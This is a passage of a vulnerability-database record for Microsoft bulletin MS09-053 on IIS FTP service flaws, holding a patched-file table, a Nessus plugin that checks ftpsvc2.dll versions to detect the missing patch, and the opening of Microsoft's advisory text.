class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr></table></div></div></body></html>", "modified": "2018-04-17T19:02:46", "id": "KB975254", "href": "https://support.microsoft.com/en-us/help/975254/", "published": "2018-04-17T06:58:09", "title": "MS09-053: Vulnerabilities in FTP Service for Internet Information Services could allow remote code execution", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-01-01T01:42:22", "bulletinFamily": "scanner", "description": "The remote host has a version of IIS whose FTP service is affected by\none or both of the following vulnerabilities :\n\n - By sending specially crafted list commands to the\n remote Microsoft FTP service, an attacker is able\n to cause the service to become unresponsive.\n (CVE-2009-2521)\n\n - A flaw in the way the installed Microsoft FTP service\n in IIS handles list commands can be exploited to\n execute remote commands in the context of the\n LocalSystem account with IIS 5.0 under Windows 2000 or\n to cause the FTP server to stop and become unresponsive\n with IIS 5.1 under Windows XP or IIS 6.0 under Windows\n 2003. (CVE-2009-3023)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS09-053.NASL", "href": "https://www.tenable.com/plugins/nessus/42109", "published": "2009-10-13T00:00:00", "title": "MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(42109);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_xref(name:\"EDB-ID\", value:\"17476\");\n script_xref(name:\"IAVB\", value:\"2009-B-0052\");\n script_xref(name:\"MSFT\", value:\"MS09-053\");\n script_xref(name:\"MSKB\", value:\"975254\");\n script_xref(name:\"CERT\", value:\"276653\");\n script_xref(name:\"EDB-ID\", value:\"9541\");\n script_xref(name:\"EDB-ID\", value:\"9559\");\n script_xref(name:\"EDB-ID\", value:\"9587\");\n script_xref(name:\"EDB-ID\", value:\"16740\");\n script_xref(name:\"EDB-ID\", value:\"17476\");\n\n script_name(english:\"MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)\");\n script_summary(english:\"Checks version of ftpsvc2.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote FTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of IIS whose FTP service is affected by\none or both of the following vulnerabilities :\n\n - By sending specially crafted list commands to the\n remote Microsoft FTP service, an attacker is able\n to cause the service to become unresponsive.\n (CVE-2009-2521)\n\n - A flaw in the way the installed Microsoft FTP service\n in IIS handles list commands can be exploited to\n execute remote commands in the context of the\n LocalSystem account with IIS 5.0 under Windows 2000 or\n to cause the FTP server to stop and become unresponsive\n with IIS 5.1 under Windows XP or IIS 6.0 under Windows\n 2003. (CVE-2009-3023)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-053\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for IIS 5.0, 5.1, 6.0, and\n7.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS09-053 Microsoft IIS FTP Server NLST Response Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS09-053';\nkb = '975254';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2,3', win2003:'2', vista:'0,2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ftpsvc2.dll\", version:\"7.0.6002.22219\", min_version:\"7.0.6002.22000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ftpsvc2.dll\", version:\"7.0.6002.18107\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ftpsvc2.dll\", version:\"7.0.6001.22516\", min_version:\"7.0.6001.22000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ftpsvc2.dll\", version:\"7.0.6001.18327\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ftpsvc2.dll\", version:\"7.0.6000.21123\", min_version:\"7.0.6000.20000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ftpsvc2.dll\", version:\"7.0.6000.16923\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"ftpsvc2.dll\", version:\"6.0.3790.4584\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"ftpsvc2.dll\", version:\"6.0.2600.5875\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x64\", file:\"ftpsvc2.dll\", version:\"6.0.3790.4584\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"ftpsvc2.dll\", version:\"6.0.2600.3624\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2000\n hotfix_is_vulnerable(os:\"5.0\", file:\"ftpsvc2.dll\", version:\"5.0.2195.7336\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS09-053 - Important\r\nVulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution &#40;975254&#41;\r\nPublished: October 13, 2009\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves two publicly disclosed vulnerabilities in the FTP Service in Microsoft Internet Information Services &#40;IIS&#41; 5.0, Microsoft Internet Information Services &#40;IIS&#41; 5.1, Microsoft Internet Information Services &#40;IIS&#41; 6.0, and Microsoft Internet Information Services &#40;IIS&#41; 7.0. On IIS 7.0, only FTP Service 6.0 is affected. The vulnerabilities could allow remote code execution &#40;RCE&#41; on systems running FTP Service on IIS 5.0, or denial of service &#40;DoS&#41; on systems running FTP Service on IIS 5.0, IIS 5.1, IIS 6.0 or IIS 7.0.\r\n\r\nThis security update is rated Important for IIS 5.0; IIS 5.1; IIS 6.0; and FTP Service 6.0 on IIS 7.0. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by modifying the way that the FTP Service handles list operations. For more information about the vulnerabilities, see the Frequently Asked Questions &#40;FAQ&#41; subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update also addresses the vulnerability first described in Microsoft Security Advisory 975191.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update at the earliest opportunity using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 975254 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nIIS 5.0 &#40;FTP Service 5.0&#41;\t \t \t \t \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nNone\r\nIIS 5.1 &#40;FTP Service 5.1&#41;\t \t \t \t \r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.1\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.1\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\nIIS 6.0 &#40;FTP Service 6.0&#41;\t \t \t \t \r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\nIIS 7.0 &#40;FTP Service 6.0&#41;\t \t \t \t \r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\n\r\nNon-Affected Software\r\n\r\nOperating System\r\n\t\r\n\r\nComponent\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 &#40;FTP Service 7.5*&#41;\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 &#40;FTP Service 7.5*&#41;\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 &#40;FTP Service 7.5*&#41;\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 &#40;FTP Service 7.5*&#41;\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 &#40;FTP Service 7.5&#41;\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 &#40;FTP Service 7.5&#41;\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 &#40;FTP Service 7.5&#41;\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 &#40;FTP Service 7.5&#41;\r\n\r\n*Available as an out-of-box download. See entry in Frequently Asked Questions.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions &#40;FAQ&#41; Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI installed FTP using Windows Server 2008 Server Manager. Is my system affected?\r\nWhen you use Windows Server 2008 Server Manager to install FTP, you are installing FTP Service 6.0, which is affected. Microsoft recommends that you install the appropriate security update from this bulletin or upgrade to FTP Service 7.5.\r\n\r\nIs FTP Service 7.5 for Windows Vista or Windows Server 2008 affected by this vulnerability?\r\nNo. FTP Service 7.5, available as an out-of-box download for 32-bit and x64-based versions of Windows Vista and Windows Server 2008, is not affected by this vulnerability. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x86&#41;\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x64&#41;\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin&#39;s release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tIIS FTP Service DoS Vulnerability - CVE-2009-2521\tIIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\tAggregate Severity Rating\r\nIIS 5.0 &#40;FTP Service 5.0&#41;\t \t \t \r\n\r\nMicrosoft Internet Information Services 5.0 on\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nIIS 5.1 &#40;FTP Service 5.1&#41;\t \t \t \r\n\r\nMicrosoft Internet Information Services 5.1 on\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nIIS 6.0 &#40;FTP Service 6.0&#41;\t \t \t \r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nIIS 7.0 &#40;FTP Service 6.0&#41;\t \t \t \r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for x64-based bit Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nIIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nA vulnerability exists in the FTP Service in Microsoft Internet Information Services &#40;IIS&#41; 5.0, Microsoft Internet Information Services &#40;IIS&#41; 5.1, Microsoft Internet Information Services &#40;IIS&#41; 6.0, and Microsoft Internet Information Services &#40;IIS&#41; 7.0. The vulnerability could allow denial of service &#40;DoS&#41;.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-2521.\r\n\t\r\nMitigating Factors for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your 